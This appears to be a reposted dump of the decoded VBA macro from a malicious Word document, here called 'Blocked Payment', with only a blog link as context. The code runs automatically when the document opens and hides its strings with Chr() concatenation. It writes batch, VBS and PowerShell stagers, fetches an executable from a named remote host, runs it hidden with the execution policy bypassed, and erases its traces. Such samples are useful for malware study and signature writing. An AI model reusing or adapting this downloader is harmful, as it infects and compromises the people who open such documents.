Blocked Payment decoded

1. http://sanesecurity.blogspot.co.uk/
2. Sanesecurity ClamAV blog: zero hour malware, phishing and scams
3. A hopefully interesting blog from the world of zero hour malware, phishing, scams and spams
4.  
5. Attribute VB_Name = "ThisDocument"
6. Attribute VB_Base = "1Normal.ThisDocument"
7. Attribute VB_GlobalNameSpace = False
8. Attribute VB_Creatable = False
9. Attribute VB_PredeclaredId = True
10. Attribute VB_Exposed = True
11. Attribute VB_TemplateDerived = True
12. Attribute VB_Customizable = True
13. Sub Auto_Open()
14. h
15. End Sub
16. Sub h()
17.  
18. Dim MY_FILENDIR, ASDASDSA, MY_FILDIR, XPFILEDIR, JAISODJAS
19. ds = 100
20. USER = Environ$("" + Chr(Abs(ds - 217)) + "s" & "er" & "na" & "me")
21.  
22. jks = ds
23.  
24. PST2 = "" & "" & "a" + "do" & "be" & "ac" & "d-u" & "pd" & "a" & "te" & ""
25. VBT2 = "" & "a" + Chr(100) + "o" & "b" & "ea" & "cd-up" & "da" & "te" & ""
26. VBTXP2 = "" & "a" & Chr(100) & "o" & "be" + "ac" & "d-u" + "pd" + "atex" + "p" & ""
27. BART2 = "" & "a" + Chr(100) & "o" & "b" & "e" + "ac" & "d-up" + "date" & ""
28.  
29. PST1 = PST2 + "." + Chr(Asc("p")) + Chr(ds + 15) + "1"
30. VBT1 = VBT2 + "." + Chr(118) + "b" + Chr(Asc("s")) + ""
31. VBTXP = VBTXP2 + "." + Chr(Asc("v")) + Chr(Asc("b")) + "s" + ""
32. BART = BART2 + Chr(Abs(46)) + Chr(Abs(98)) + Chr(Asc(Chr(Asc("a")))) + Chr(Asc(Chr(ds + 16))) + ""
33.  
34. JSIQOJQ = BART2 + Chr(Abs(ds - 100 - 46)) + Chr(Abs(ds - 100 - 98)) + Chr(Asc(Chr(Abs(ds / 2 + 47)))) + Chr(Asc(Chr(ds + Fix(16.2)))) + "" & ""
35.  
36. BART = JSIQOJQ
37. MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\AppData\Local\Temp\" + PST1 + "" & ""
38.  
39. ASDASDSA = "" + "c:\" + Chr(Asc("U")) + "sers\" + USER + "\App" + Chr(Asc("D")) + "ata\Local\" + Chr(Asc("T")) + "emp\" + BART + "" & ""
40. MY_FILDIR = "c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1 + ""
41. XPFILEDIR = "c:\Windows\Temp\" + VBTXP
42. TRT = "c:\Windows\Temp\" + BART
43. KRT = TRT
44. HYF = KRT
45. NUWHDGJS = HYF
46. KJSAHDFFFJ = MY_FILDIR
47.  
48. On Error Resume Next
49. SetAttr MY_FILENDIR, vbNormal
50.  
51. If (Len(Dir(MY_FILENDIR)) <> 0) Then
52. Kill MY_FILENDIR
53. End If
54.  
55. On Error Resume Next
56. SetAttr ASDASDSA, vbNormal
57. If (Dir(ASDASDSA) <> "") Then
58. Kill ASDASDSA
59. End If
60.  
61. On Error Resume Next
62. SetAttr MY_FILDIR, vbNormal
63. If (Dir(MY_FILDIR) <> "") Then
64. Kill KJSAHDFFFJ
65. End If
66.  
67. On Error Resume Next
68. SetAttr XPFILEDIR, vbNormal
69. If (Dir(XPFILEDIR) <> "") Then
70. Kill XPFILEDIR
71. End If
72.  
73. Dim Uuwqdhj, FileNumber, FileNumb, FileNu, FileNuG, FileNs, mttt, jskw As Integer
74.  
75. Dim retVal As Variant
76.  
77. FileNumber = FreeFile
78. FileNumb = FreeFile
79. FileNu = FreeFile
80. FileNukk = FreeFile
81.  
82. FileNs = FreeFile
83. Kasdwq = FreeFile
84. FileNuG = FreeFile
85.  
86. Dim objWMIService As Variant
87. Dim colOperatingSystems As Variant
88. Dim objOperatingSystem As Variant
89. Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
90. SETL = "colOperatingSystemsKSAHDIUOQWdsad asad32k r8929h2f uigt8y yr2u3gby2g yu dg2uyg3bdu "
91.  
92. Set colOperatingSystems = objWMIService.ExecQuery("Select * from W" + "in3" + "2_Op" + "eratin" + "gS" + "ystem")
93. For Each objOperatingSystem In colOperatingSystems
94. SysReport = SysReport & "The operating system on this computer is " & _
95. objOperatingSystem.Caption & " (" & objOperatingSystem.Version & ")"
96. Next
97.  
98. Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
99. Set colOperatingSystems = objWMIService.ExecQuery("Select * from W" + "in3" + "2_Op" + "eratin" + "gS" + "ystem")
100. For Each objOperatingSystem In colOperatingSystems
101. winverstr = objOperatingSystem.Version
102. Next
103.  
104. winver = Val(winverstr)
105. WaitFor (1)
106. jskw = winver
107.  
108. If (jskw <= 5.5) Then
109.  
110. Open NUWHDGJS For Output As #Kasdwq
111. Print #Kasdwq, ""
112. Print #Kasdwq, "@echo off"
113. Print #Kasdwq, ":pinkator"
114. Print #Kasdwq, "pin" + "g 1.3.1.2 -n" & " 2" + ""
115. LKASHDUIQWHQUDKNBWQKJDHQ = "sakdj lksajds" + "sakdj sakjd sakhd jhqwiudhquid gughg"
116. Print #Kasdwq, "c" & "s" + "c" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Windows\Temp" + "\" + VBTXP + Chr(34) + ""
117. Print #Kasdwq, "pin" + "g 2.2.1.1 -n" & " 2" + ""
118. Print #Kasdwq, "" & ":windows"
119. AIYDHLKASHDUIQWHQUDKNBWQKJDHQ = "qwe23r32sakdj sdqwlksajds" + "sakdj sakjd sakhd jhqwiudhquid gughg"
120. WQJHLKASHDUIQWHQUDKNBWQKJDHQ = "sa3244tgfdkdj lksajds" + "sakdj sakjd sakhd jhqwiudhquid gughg"
121. Print #Kasdwq, "c:\W" + "indows\Te" + "mp\444" + "." + Chr(Asc("e")) + Chr(Asc("x")) + Chr(Asc("e"))
122. Print #Kasdwq, ":loop"
123. Print #Kasdwq, "pin" + "g 1.3.1.2 -n" & " 1"
124. Print #Kasdwq, "set tar1=" + Chr(34) + BART + Chr(33 + 1)
125. Print #Kasdwq, "del " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34)
126. Print #Kasdwq, "del " + Chr(34) + "c" & ":\" & "W" & "ind" & "ows\T" & "em" & "p\" + Chr(34) + "%tar1%" + "" & ""
127. Print #Kasdwq, "if " + "exist " + Chr(34) + "c:\W" + "indows\T" + "emp\" + Chr(34) + "%tar1%" + " goto loop" + ""
128. Print #Kasdwq, "if " + "exist " + Chr(34) + "c:\W" + "indows\T" + "emp\" + VBTXP + Chr(34) + " goto loop"
129. Print #Kasdwq, "exit"
130. Close #Kasdwq
131.  
132. WaitFor (2)
133. mttt = 88
134.  
135. Open XPFILEDIR For Output As #FileNumber
136. Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://phadungnaree.ac.th/tmp/uok" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
137. Print #FileNumber, "jfeuygq = " + Chr(34) + "4.e" + Chr(34) + "+" + Chr(34) + "xe" + Chr(34)
138. Print #FileNumber, "strTecation = " + Chr(34) + "c:\" + Chr(Asc("W")) + "indows\" + Chr(Asc("T")) + "emp\44" + Chr(34) + "+" + "jfeuygq"
139. Print #FileNumber, "khdfu =" + Chr(34) + "M" + Chr(34) + "+" + Chr(34) + "SX" + Chr(34) + "+" + Chr(34) + "ML2.X" + Chr(34) + "+" + Chr(34) + "MLH" + Chr(34) + "+" + Chr(34) + "T" + Chr(34) + "+" + Chr(34) + "T" + Chr(34) + "+" + "Chr(80)"
140. Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(khdfu)" + ""
141. Print #FileNumber, "objXM" & "LH" & "T" & "TP.op" & "en " + Chr(34) + "G" & "ET" + Chr(34) + ", strRT, False"
142. JASHDJK = "send()"
143. Print #FileNumber, "objXMLHTTP." + JASHDJK + " "
144. Print #FileNumber, "If objXMLHTTP.Status = 200 Then" + "" & ""
145. Print #FileNumber, "uwqhda = " + Chr(34) + "ADODB." + Chr(34)
146. Print #FileNumber, "Set objADOStream = C" + "reateO" + "bject(uwqhda+Chr(Sgn(-4)+84)+" + Chr(34) + "tream" + Chr(34) + ")"
147.  
148. Print #FileNumber, "objADOStream.Open "
149. Print #FileNumber, "objADOStream.Type = 1"
150. Print #FileNumber, "objADOStream.Write objXMLHTTP.Re" + "" + "sp" + "onse" + "Body "
151. Print #FileNumber, "objADOStream.Position = 0 "
152. Print #FileNumber, "objADOStream.S" & "aveToF" & "ile st" & "rT" & "ecation " + ""
153. Print #FileNumber, "objADOStream.Close "
154. Print #FileNumber, "Set objADOStream = Nothing "
155. Print #FileNumber, "End if "
156. Print #FileNumber, "Set objXMLHTTP = Nothing"
157. Print #FileNumber, "Set objShell " & "=" + " " + Chr(Asc("C")) + "reate" + "O" + "bject(" + Chr(34) + "W" + "S" + "cript." + "S" + "hell" + Chr(34) + ")" + "" & ""
158. Print #FileNumber, ""
159. Close #FileNumber
160.  
161. WaitFor (1)
162.  
163. ASKJD = TRT
164. retVal = Shell(ASKJD, 0)
165.  
166. End If
167.  
168.  
169. If (winver > 5.5) Then
170. Open MY_FILENDIR For Output As #FileNumber
171. Print #FileNumber, "$do" & "wn = " + Chr(Asc("N")) & "ew" & "-" & Chr(79) & "bject " & Chr(Asc(Chr(Asc("S")))) & "y" & "stem." & Chr(78) & "et." & Chr(87) & "eb" & "Cli" & "ent;"
172. Print #FileNumber, "$url = '" + Chr(Asc(Chr(Asc("h")))) + Chr(Asc(Chr(Asc("t")))) + Chr(Asc("t")) + Chr(Asc(Chr(Asc("p")))) + "://phadungnaree.ac.th/tmp/uok" & ".e" & "x" + "e';"
173. Print #FileNumber, "$file = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "4" & "44." + Chr(101) & "xe';"
174. Print #FileNumber, "$down.headers[" + Chr(39) + "User-Agent" + Chr(39) + "] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Saf" & "ari/600.1.25'" + "+''" + "" + ";"
175. Print #FileNumber, "$d" + "o" & Chr(Asc("w")) + "n" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($u" & "rl,$" & "file);"
176. Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;"
177. Print #FileNumber, "$someFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "444.e" & Chr(Asc("x")) + "e" & "';"
178.  
179. Print #FileNumber, "$vbsFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + VBT2 + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "v" + Chr(39) + Chr(43) + Chr(39) + "bs" + Chr(39) + ";"
180. Print #FileNumber, "$b" + "a" + "tFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + BART2; Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "b" + Chr(39) + Chr(43) + Chr(39) + "at" + Chr(39) + ";"
181. Print #FileNumber, "$p" + "sFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + PST2 + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "p" + Chr(39) + Chr(43) + Chr(39) + "s1" + Chr(39) + ";"
182.  
183. Print #FileNumber, "Start-Sleep -s 15;"
184. Print #FileNumber, "c" & Chr(109) & "d.e" & Chr(120) & "e /c 'c:\Users\" + USER + "\AppData\Local\Temp" + "\444.e" & Chr(120) & "e'; "
185. Print #FileNumber, "$file1 = gci $" + "v" + "b" + "sFilePath -Force"
186. Print #FileNumber, "$file2 = gci $" + "b" + "a" + "t" + "FilePath -Force"
187. Print #FileNumber, "$file3 = gci $" + "p" + "s" + "F" + "ilePath -Force"
188. Print #FileNumber, "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }"
189. Print #FileNumber, "If (Test-Path $batFilePath){ Remove-Item $batFilePath }"
190. Print #FileNumber, "$psHello = 'aisdjhiqowhdiq';"
191. Print #FileNumber, "If (Test-Path $someFilePath){ Remove-Item $someFilePath }"
192. Print #FileNumber, "Remove-Item $MyINvocation.InvocationName"
193. Close #FileNumber
194.  
195. Open MY_FILDIR For Output As #FileNumb
196. Print #FileNumb, "Dim dff"
197. Print #FileNumb, "dff = 68"
198. Print #FileNumb, "c" & "ur" & Chr(Asc("r")) & "ent" + Chr(Asc("D")) + "irec" + "tory = left(WSc" & "ript.ScriptFullName," & "(L" + "en(W" + "S" + "cri" + "pt.Sc" + "riptFullName))-(len(W" + "Sc" + "ript.ScriptName)))"
199. Print #FileNumb, "S" & "et o" & "bj" & Chr(Asc("F")) & "SO=C" & "re" & "at" & "eO" & "b" & "je" & "ct(" & Chr(34) & Chr(34) & Chr(34) & "&" & "S" & Chr(34) & Chr("&") & Chr(34) & "cr" & "ipt" & "ing.F" & "ileS" & "ystem" & "Ob" & "ject" & Chr(34) & ")"
200. Print #FileNumb, "cur" + "rent" + Chr(Asc("F")) + "ile = " & Chr(34) & "C:\" & Chr(Asc("U")) & "sers\" + USER + "\AppData\Local\Temp" + "\" + PST2 + Chr(34) + "&" + Chr(34) + "." + Chr(34) + "&" + Chr(34) + "p" + Chr(34) + "&" + Chr(34) + "s1" + Chr(34)
201. Print #FileNumb, "" & Chr(83) & "et " & Chr(111) & "bj" & Chr(83) & "he" + Chr(Asc("l")) + Chr(Asc("l")) + " = " & Chr(Sgn(-4) + 68) + "reate" & Chr(79) & Chr(98) & "ject(" & Chr(34) & "W" & Chr(115) & "cript." & Chr(115) & "hell" & Chr(34) & ")" + ""
202. Print #FileNumb, "" & Chr(111) & "bj" & Chr(83) & "hell" & Chr(46) & Chr(82) & "un " & Chr(34) & "p" & Chr(111) & "wer" & Chr(83) + Chr(34) + "+" + Chr(34) & "hell.e" & Chr(120) & "e -n" & Chr(111) & "exit -Exe" & "cutionP" & Chr(111) & "licy" & " byp" & "ass -n" & Chr(111) & "pr" & Chr(111) & "file -file " & Chr(34) & " & currentFile,0,true"
203.  
204. Print #FileNumb, ""
205. Close #FileNumb
206.  
207. Open ASDASDSA For Output As #FileNs
208. Print #FileNs, "@echo off"
209. Print #FileNs, "ping 1.1.2.2 -n" & " 2"
210. Print #FileNs, "chcp 1251"
211. Print #FileNs, ":csakclasjdklas"
212. Print #FileNs, "set Var1=" + Chr(34) + "." + Chr(34)
213. Print #FileNs, "set Var2=" + Chr(34) + "v" + Chr(34)
214. Print #FileNs, "set Var3=" + Chr(34) + "bs" + Chr(34)
215. Print #FileNs, "set Var4=" + Chr(34) & "c:\Users\" + USER + "\AppData\Local\Temp" + "\" + VBT2 + Chr(34)
216. Print #FileNs, "c" & "sc" & "ri" & "pt" & Chr(46) + Chr(101) & Chr(120) & "e " & "%Var4%" + "%Var1%%Var2%%Var3%"
217. Print #FileNs, "exit"
218. Close #FileNs
219.  
220. SetAttr MY_FILENDIR, vbNormal
221. SetAttr ASDASDSA, vbNormal
222. SetAttr MY_FILDIR, vbNormal
223.  
224. WaitFor (1)
225. SJAKLD = ASDASDSA
226. retVal = Shell(SJAKLD, 0)
227. End If
228.  
229.  
230. findTest
231. secondTest
232. For Each myStoryRange In ActiveDocument.StoryRanges
233. With myStoryRange.Find
234. .Text = "<" & "sel" & "ect>"
235. .Replacement.Text = " "
236. .Wrap = wdFindContinue
237. .Execute Replace:=wdReplaceAll
238. End With
239. Next myStoryRange
240.  
241. For Each myStoryRange In ActiveDocument.StoryRanges
242. With myStoryRange.Find
243. .Text = "</s" & "ele" & "ct>"
244. .Replacement.Text = " "
245. .Wrap = wdFindContinue
246. .Execute Replace:=wdReplaceAll
247. End With
248. Next myStoryRange
249.  
250. For Each myStoryRange In ActiveDocument.StoryRanges
251. With myStoryRange.Find
252. .Text = "<" & "in" & "box>"
253. .Replacement.Text = " "
254. .Wrap = wdFindContinue
255. .Execute Replace:=wdReplaceAll
256. End With
257. Next myStoryRange
258.  
259. For Each myStoryRange In ActiveDocument.StoryRanges
260. With myStoryRange.Find
261. .Text = "</" & "in" & "box>"
262. .Replacement.Text = " "
263. .Wrap = wdFindContinue
264. .Execute Replace:=wdReplaceAll
265. End With
266. Next myStoryRange
267.  
268.  
269. End Sub
270. Sub WaitFor(NumOfSeconds As Long)
271. Dim SngSec As Long
272. SngSec = Timer + NumOfSeconds
273.  
274. Do While Timer < SngSec
275. DoEvents
276. Loop
277.  
278. End Sub
279.  
280. Sub AutoOpen()
281. Auto_Open
282. End Sub
283. Sub Workbook_Open()
284. Auto_Open
285. End Sub
286. Sub findTest()
287. Dim firstTerm As String
288. Dim secondTerm As String
289. Dim rrtt As Range
290. Dim selRange As Range
291. Dim selectedText As String
292. UYAS = ""
293. Set rrtt = ActiveDocument.Range
294. firstTerm = "" + "<" + "s" + "e" & "le" + "ct>" + UYAS + ""
295. secondTerm = "<" + "/" + "se" + "l" & "ec" + "t>"
296. ASKASAIEJ = "ask as8d j dnkjh12kh1 sad"
297. With rrtt.Find
298. .Text = firstTerm
299. .MatchWholeWord = True
300. .Execute
301. KASHDJKAHS = "ajsdhu9qwdhu32dhkj h231ueh31e2u heh2 ue1h"
302. rrtt.Collapse direction:=wdCollapseEnd
303. Set selRange = ActiveDocument.Range
304. selRange.Start = rrtt.End
305. .Text = secondTerm
306. .MatchWholeWord = True
307. .Execute
308. ASKSASADW = "asjldklas"
309. rrtt.Collapse direction:=wdCollapseStart
310. selRange.End = rrtt.Start
311. selectedText = selRange.Delete
312. End With
313. End Sub
314.  
315. Sub secondTest()
316. Dim firstTerm As String
317. Dim secondTerm As String
318. Dim myRanget As Range
319. Dim yytt As Range
320. Dim selRanget As Range
321. Dim selectedTextt As String
322.  
323. Set yytt = ActiveDocument.Range
324. SKHDAJKHASJ = "aslkdjk sadksaj ksaljd klsajd ksajd KSJDKASL JD"
325. firstTerm = "<" + "in" & "bo" + "x>"
326. secondTerm = "</" + "in" & "bo" + "x>"
327. With yytt.Find
328. .Text = firstTerm
329. .MatchWholeWord = True
330. .Execute
331. ASKIEJ = "ask as8d j dnkjh12kh1 sad"
332. yytt.Collapse direction:=wdCollapseEnd
333.  
334. Set selRanget = ActiveDocument.Range
335. selRanget.Start = yytt.End
336. .Text = secondTerm
337. .MatchWholeWord = True
338. .Execute
339.  
340. yytt.Collapse direction:=wdCollapseStart
341. selRanget.End = yytt.Start
342. selectedTextt = selRanget
343. selRanget.Font.Color = wdColorBlack
344. End With
345. End Sub